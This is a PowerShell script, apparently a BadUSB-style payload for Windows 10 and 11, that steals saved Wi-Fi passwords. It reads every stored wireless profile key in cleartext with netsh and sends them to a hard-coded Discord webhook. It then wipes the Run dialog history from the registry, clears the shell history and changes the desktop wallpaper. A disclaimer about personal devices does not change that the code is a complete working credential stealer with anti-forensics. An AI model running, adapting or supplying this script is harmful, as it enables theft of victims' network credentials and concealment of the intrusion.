##############################################################################################
#                                                         _;~)                  (~;_         #
#                                                        (   |                  |   )        #
#  Title        : Exfiltrate wifi passes on Win Target    ~', ',    ,''~'',   ,' ,'~         #
#  Author       : DAProgs                                     ', ','       ',' ,'            #
#  Version      : 1.0                                           ',: {'} {'} :,'              #
#  Category     : Password Exfiltration                           ;   /^\   ;                #
#  Target       : Windows 10, 11                                   ~\  ~  /~                 #
#                                                                ,' ,~~~~~, ',               #
#  My crime is that of curiosity                               ,' ,' ;~~~; ', ',             #
#                                                            ,' ,'    '''    ', ',           #
#  Use these scripts only for experimenting on your        (~  ;               ;  ~)         #
#  personnal devices                                        -;_)               (_;-          #
##############################################################################################

$DiscordwebhookUri = 'https://discord.com/api/webhooks/1419793734245285888/QAmMrxeNTFbjIA1eridj0yn7IElDu_8WfUKOvSAHjNutTIpVd8ZXJ2Tnxm2PlyeBKOMq'

$path = $env:TEMP + '' + '\Wallpaper.jpg'
$DownloadDirectory = $env:TEMP + '\'

function DeleteKeys
{
	$Reg = Get-RegistryValues 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
	foreach ($Value in $Reg)
    {
        if ($Value -eq 'MRUList') {
			Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\' -name $Value -value ' '
		}
        Else {
            Remove-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -name $Value 
        }
    }
}

function Get-RegistryValues($Key) 
{
	(Get-Item $Key).GetValueNames()
}

function DownloadBackground
{
	$Data = @{
		WallpaperURL = "https://www.home.daprogs.net/dl/" # Change to your fitting
		RegKeyPath2 = 'HKCU:\Control Panel\Desktop'
	}
    $myArray = 'background1.jpg', 'background2.jpg', 'background3.jpg', 'background4.jpg', 'background5.jpg'
    $randomItem = $myArray | Get-Random
    $WallpaperSRC = $Data.WallpaperURL + '' + $randomItem
	$WallpaperDest = $($DownloadDirectory + "\Wallpaper." + ($WallpaperSRC -replace ".*\."))
	New-Item -ItemType Directory -Path $DownloadDirectory -ErrorAction SilentlyContinue
	Start-BitsTransfer -Source $WallpaperSRC -Destination $WallpaperDest
	Set-ItemProperty -Path $Data.RegKeyPath2 -Name 'WallPaper' -Value $WallpaperDest #-Force | Out-Null
    rundll32.exe user32.dll, UpdatePerUserSystemParameters
}

function SendPass
{
    $Body='Computer:' + $env:computername
    $Body+=[Environment]::NewLine
    netsh wlan show profile |
        Select-String '(?<=All User Profile\s+:\s).+' |
        ForEach-Object {
            $wlan = $_.Matches.Value
            $passw = netsh wlan show profile $wlan key=clear |
                Select-String '(?<=Key Content\s+:\s).+'
		    $passw2=""
			try {
				$passw2=$passw.Line.split(":")[1] #Will cause errors no blank line check
			} catch {
				
			}
		    $Body+='Wlan: ' + $wlan
		    $Body+=[Environment]::NewLine
		    $Body+=$passw2
		    $Body+=[Environment]::NewLine
        }
    $Body+=[Environment]::NewLine

        $Body2 = @{
       'username' = 'SpilledCanOfBeans'
       'content' = $Body
       }
   
    Invoke-RestMethod -Uri $DiscordwebhookUri -Method 'post' -Body $Body2
}
 
 
#Set-WindowsWallpaper from Microsoft Employee
Add-Type -AssemblyName System.Drawing
 
Add-Type @"
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32;
	namespace Wallpaper	{
		public enum Style : int	{
			Tile, Center, Stretch, Fill, NoChange
		}
	 
	public class Setter {
		public const int SetDesktopWallpaper = 0x14; // SPI_SETDESKWALLPAPER
		public const int UpdateIniFile = 0x01; // SPIF_UPDATEINIFILE
		public const int SendWinIniChange = 0x02; // SPIF_SENDWININICHANGE
		 
		[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
		private static extern int SystemParametersInfo (int uAction, int uParam, string lpvParam, int fuWinIni);
		 
		public static void SetWallpaper ( string path, Wallpaper.Style style ) {
			SystemParametersInfo( SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange );
			RegistryKey key = Registry.CurrentUser.OpenSubKey("Control Panel\\Desktop", true);
			switch( style )	{
				case Style.Stretch :
				key.SetValue(@"WallpaperStyle", "2") ;
				key.SetValue(@"TileWallpaper", "0") ;
				break;
				case Style.Center :
				key.SetValue(@"WallpaperStyle", "1") ;
				key.SetValue(@"TileWallpaper", "0") ;
				break;
				case Style.Tile :
				key.SetValue(@"WallpaperStyle", "1") ;
				key.SetValue(@"TileWallpaper", "1") ;
				break;
				case Style.Fill :
				key.SetValue(@"WallpaperStyle", "10") ;
				key.SetValue(@"TileWallpaper", "0") ;
				break;
				case Style.NoChange :
				break;
			}
			key.Close();
		}
	}
}
"@


SendPass
DeleteKeys
DownloadBackground 	 
 
### now pass the generated BMP file and set the wallpaper.
$Tile = 3
#Center = 1
#Stretch = 2
#Fill = 3
#NoChange = 4

[Wallpaper.Setter]::SetWallpaper( $path, $Tile)
Start-Sleep -Seconds 2
#Remove-Item -Path $path

Clear-History